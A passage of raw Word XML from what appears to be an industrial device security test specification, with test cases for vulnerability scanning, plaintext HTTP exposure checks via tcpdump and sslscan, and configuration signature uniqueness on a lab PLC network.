          <w:p w14:paraId="7ABA0AF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Open https://127.0.0.1:9392, log in, create targets for SRIO (192.168.0.2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E42D2C9"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PLC (192.168.0.1), and start a scan (or via CLI, see ifm CM-008</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749D400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framework: gvm-cli --gmp-username admin --gmp-password &lt;pw&gt; socket --xml \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FAD8882"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"&lt;create_target&gt;&lt;name&gt;cm_rq004-02&lt;/name&gt;&lt;hosts&gt;192.168.0.2&lt;/hosts&gt;&lt;/create_target&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F5ABFC3" w14:textId="77777777" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0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Compare the GVM findings against the manually compiled list; document</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE1F3D6" w14:textId="677B8231" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0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lastRenderedPageBreak/>
              <w:t>#    gaps (no machine-readable SBOM, no automated CVE correlation possible).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E4E0E" w:rsidRPr="006D5B99"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1868BEEE" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:commentRangeStart w:id="0"/>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
            <w:commentRangeEnd w:id="0"/>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="0"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A30ADA2" w14:textId="686B4DE8" w:rsidR="007E4E0E" w:rsidRPr="006D5B99" w:rsidRDefault="007E4E0E" w:rsidP="007E4E0E">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Expected FAIL / gap confirmation </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> no machine-readable SBOM exists, components only derivable from free-text documentation, no automated CVE correlation possible (confirms G-2 in RQ-004/RQ-006).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09836C9D" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D364D9" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284930B1" w14:textId="59BDAB7D" w:rsidR="00643D07" w:rsidRPr="006D5B99" w:rsidRDefault="00643D07" w:rsidP="00457A19">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ004-0</w:t>
      </w:r>
      <w:r w:rsidR="00C76E4D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00EF350A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plaintext Exposure of Identification Data</w:t>
      </w:r>
      <w:r w:rsidR="00EF350A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45458346" w14:textId="77777777" w:rsidR="00643D07" w:rsidRPr="006D5B99" w:rsidRDefault="00643D07" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C374D92" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A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7190E7A3"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A0E0195" w14:textId="727CC9F9" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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C76E4D" w:rsidRPr="006D5B99"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7361EFE4" w14:textId="6EA973E0" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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C76E4D" w:rsidRPr="006D5B99"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08E37D09" w14:textId="77777777"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C76E4D" w:rsidRPr="006D5B99"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23D2E93F" w14:textId="47B07812" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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identification data is served without transport encryption and can be observed passively on the segment</w:t>
            </w:r>
            <w:r w:rsidR="00EE458F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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33A881F0"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Trigger a legitimate identification read.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628D942D" w14:textId="77777777" w:rsidR="009403A3"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Passively observe the exchange.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57003487" w14:textId="6C7A60D4" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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identification content is recoverable in cleartext and that no encrypted transport option exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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57254CC2" w14:textId="77777777" w:rsidR="009403A3"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34279597" w14:textId="73386FC8" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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cleartext recoverable, no encrypted transport. Recorded as a defence-in-depth note; not scored as a safety-security FAIL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5671C226" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1BEF9B" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532165A" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99" w:rsidRDefault="009305A1" w:rsidP="009305A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6D5B99"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6D5B99" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B70A0B" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="006D5B99"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305A1" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150AA2E6" w14:textId="0595B734" w:rsidR="009305A1" w:rsidRPr="006D5B99"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TC-RQ004-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C4AE5" w:rsidRPr="006D5B99"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5C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718CB61B" w14:textId="059CB332"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NV1</w:t>
            </w:r>
            <w:r w:rsidR="00CC21E5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/ NV2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C4AE5" w:rsidRPr="006D5B99"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5C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458508D2" w14:textId="1222BF5C" w:rsidR="005C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">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Wireshark/tshark, sslscan (CM-005).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C4AE5" w:rsidRPr="006D5B99"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5C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FC3D1A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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060CEDF8" w14:textId="514A4FEB"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391206FB"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sslscan --show-certificate $SRIO:80 &gt; cm_rq004-03_sslscan.txt 2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C7B8DB" w14:textId="4A766128" w:rsidR="00E238E2" w:rsidRPr="006D5B99" w:rsidRDefault="00E238E2" w:rsidP="00CC21E5">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="690B97B3"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sudo tcpdump -i eth1 host $SRIO and port 80 -w cm_rq004-03_http.pcap &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC7AEAD"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curl -s http://$SRIO/deviceinfo/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13851E55"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kill %1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B18563A" w14:textId="77777777"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wireshark cm_rq004-03_http.pcap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB0E6CF" w14:textId="6F74E7B6" w:rsidR="00E238E2" w:rsidRPr="006D5B99" w:rsidRDefault="00E238E2" w:rsidP="00E238E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 -&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00CC21E5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>right-click</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP-Paket -&gt; Follow -&gt; HTTP Stream</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="593ABC58" w14:textId="4234D45D" w:rsidR="005C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">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5C4AE5" w:rsidRPr="006D5B99"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61707E04" w:rsidR="005C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="005C4AE5" w:rsidP="005C4AE5">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61310CA0" w14:textId="77777777" w:rsidR="00030551"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sslscan returns NO TLS handshake at all (immediate connection error, since port 80 only offers plaintext HTTP without TLS, SRIO-7903/7907 „no HTTPS“).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A8532B" w14:textId="7D8EA832" w:rsidR="005C4AE5" w:rsidRPr="006D5B99" w:rsidRDefault="002C5E8B" w:rsidP="002C5E8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Additionally, a parallel capture shows the plaintext content in Wireshark </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">(„Follow &gt; HTTP Stream“). Confirms G-3 (plaintext, no transport encryption) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> recorded as a defense-in-depth observation, not a safety-security FAIL per EN 50742 FR4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D21C1C2" w14:textId="77777777" w:rsidR="00865E92" w:rsidRPr="006D5B99" w:rsidRDefault="00865E92" w:rsidP="00865E92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB3826F" w14:textId="6AD87B99" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ004-0</w:t>
      </w:r>
      <w:r w:rsidR="00C45834" w:rsidRPr="00FC693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Data-Identification </w:t>
      </w:r>
      <w:r w:rsidR="009403A3" w:rsidRPr="00FC693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uniqueness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439FA694" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC655D4" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">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6D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D39703E"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2563D25F" w14:textId="322AF983" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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RQ-004 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3893B4B5" w14:textId="4C335310" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E8262A" w14:textId="56DC7A83" w:rsidR="00C76E4D" w:rsidRPr="006D5B9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22E3E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084FE8AB" w14:textId="79A41970" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03DC93CA"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configuration A; read the configuration signature.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="401E6CF9" w14:textId="77777777" w:rsidR="000A22B5"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Load a materially different configuration B; read the configuration signature.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519BDA4A" w14:textId="6A4755F6" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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two signatures differ and each uniquely maps to its configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FCE6A6D" w14:textId="77777777" w:rsidR="000A22B5"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distinct configurations produce distinct signatures (data identified via fingerprint). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C45FC6" w14:textId="0592E7AC" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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limitation: the signature identifies that a specific configuration is loaded but does not enumerate/classify which data elements are EHSR-critical (residual gap).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25FCE0A9" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7143763A" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C76E4D" w:rsidP="00C76E4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6D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7076C09F" w14:textId="77777777" w:rsidR="00C76E4D" w:rsidRPr="006D5B99"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76E4D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00C76E4D" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40159938" w14:textId="4A856C98" w:rsidR="00C76E4D" w:rsidRPr="006D5B99" w:rsidRDefault="00C4583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RQ004-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
